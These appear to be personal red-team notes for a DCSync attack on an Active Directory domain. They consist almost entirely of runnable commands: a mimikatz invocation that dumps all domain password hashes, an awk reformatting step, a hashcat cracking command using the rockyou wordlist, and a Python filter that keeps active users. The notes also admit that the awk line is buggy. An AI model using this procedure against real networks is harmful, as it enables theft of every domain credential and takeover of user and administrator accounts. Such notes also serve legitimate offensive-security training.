DCSync

On target

.\m.exe "lsadump::dcsync /domain:cyberbotic.io /all /csv" "exit" > dcsync.csv

On kali

cat hashes | awk '{print $2"::aad3b435b51404eeaad3b435b51404ee:"$3":::"}' > hashes_dump

Above AWK currently breaks on space in SAM name, needs to be fixed

hashcat hashes_dump -m 1000 /usr/share/wordlists/rockyou.txt

Remove any disabled users from the hashes_dump (active_users.txt from PowerView):

# Read active users from file
with open("active_users.txt", "r") as f:
    active_users = {line.strip() for line in f}

# Read hashes from file
with open("hashes_dump", "r") as f:
    hashes = [line.strip() for line in f]

# Filter hashes to only include active users
filtered_hashes = [entry for entry in hashes if entry.split("::")[0] in active_users]

# Save filtered results to a new file
with open("filtered_hashes.txt", "w") as f:
    f.writelines("\n".join(filtered_hashes) + "\n")

print("Filtering complete. Saved to filtered_hashes.txt")

Last updated 7 months ago